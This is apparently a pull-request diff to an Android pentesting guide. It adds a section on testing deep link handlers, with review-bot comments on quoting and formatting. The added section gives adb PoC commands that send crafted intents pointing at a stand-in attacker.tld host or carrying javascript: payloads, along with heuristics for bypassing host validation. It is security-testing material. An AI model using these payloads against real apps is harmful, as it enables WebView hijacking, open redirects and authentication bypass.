Deep-C #1844
@@ -231,6 +231,31 @@ In order to find the **code that will be executed in the App**, go to the activi

Learn how to [call deep links without using HTML pages](#exploiting-schemes-deep-links).

### Deep link security testing & adb PoCs

- **Entry point discovery**: exported Activities that declare **`<action android:name="android.intent.action.VIEW" />` + `<category android:name="android.intent.category.BROWSABLE" />`** are remotely reachable via crafted URIs (custom schemes or `http/https` App Links). Prioritise paths containing **login/reset/payment/wallet/admin** keywords.
- **Validation bypass heuristics**: weak host checks such as `endsWith()`, `contains()`, permissive regexes, or substring allowlists can usually be bypassed with attacker-controlled subdomains, prefix/suffix tricks, and URL/UTF‑8 double-encoding.
- **WebView sinks**: if the handler forwards the incoming URI or query params to `WebView.loadUrl(...)`, you can coerce the app to render arbitrary attacker content. If scheme validation is weak, try **`javascript:`** payloads as well as external `https://` URLs.
- **adb PoC templates** (implicit vs explicit):

```bash
# Generic implicit VIEW (custom scheme or App Link)
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"

# Explicitly target a specific Activity
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myapp://host/path?redirect=https://attacker.tld"

# Try javascript: when scheme filters are lax
adb shell am start -a android.intent.action.VIEW \
-d "myapp://host/web?url=javascript:alert(1)"
```

- **Operational tips**: capture multiple payload variants (external URL vs `javascript:`) and replay them quickly against a device/emulator to distinguish real issues (open-redirect/auth-bypass/WebView URL injection) from static-analysis noise.
- **Automation**: [Deep-C](https://github.com/KishorBal/deep-C) automates deeplink hunting by decompiling the APK (apktool + dex2jar + jadx), enumerating **exported + browsable** activities, correlating weak validation and `WebView.loadUrl` flows, and emitting ready-to-run adb PoCs (optionally auto-executed with `--exec`).


## AIDL - Android Interface Definition Language

The **Android Interface Definition Language (AIDL)** is designed for facilitating communication between client and service in Android applications through **interprocess communication** (IPC). Since accessing another process's memory directly is not permitted on Android, AIDL simplifies the process by marshalling objects into a format understood by the operating system, thereby easing communication across different processes.
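Review bot: the adb templates quote the URI only for the local shell; `adb shell` hands the joined command to the device's `/bin/sh`, so once a URI carries more than one query parameter (the section itself talks about "query params") the `&` is parsed as a command separator and the second parameter is silently lost. Suggest either escaping it or adding a second quoting layer, e.g. `-d "'myapp://host/web?url=https://attacker.tld&next=/home'"`, and saying so next to the templates. The `javascript:` PoC (`-d "myapp://host/web?url=javascript:alert(1)"`) also needs the precondition spelled out: `WebView` ships with JavaScript disabled, so it only fires when the target calls `setJavaScriptEnabled(true)`, and a missing alert is otherwise a false negative rather than evidence of a filter. Minor: the explicit example targets package `com.example` (`-n com.example/.MainActivity`) while the implicit one uses `com.example.app` in the URI; one placeholder throughout avoids confusing readers who copy both.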
@@ -511,6 +536,7 @@ Tools / scripts that speed-up Binder reconnaissance:
- [Android manifest provider: readPermission](https://developer.android.com/guide/topics/manifest/provider-element#rprmsn)
- [Android manifest provider: writePermission](https://developer.android.com/guide/topics/manifest/provider-element#wprmsn)
- [Android ContentResolver.update()](https://developer.android.com/reference/android/content/ContentResolver#update(android.net.Uri,%20android.content.ContentValues,%20java.lang.String,%20java.lang.String[]))
- [Deep-C – Android deep link exploitation framework](https://github.com/KishorBal/deep-C)

{{#include ../../banners/hacktricks-training.md}}

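Review bot: the new reference entry `[Deep-C – Android deep link exploitation framework](...)` breaks the formatting of the surrounding list, where entries are titled `Name: detail` (e.g. `Android manifest provider: readPermission`) without dashes; suggest `[Deep-C: Android deep link exploitation framework](https://github.com/KishorBal/deep-C)`. The same URL is already linked inline in the new "Automation" bullet, so if this list is meant to hold only primary Android documentation the entry can be dropped instead.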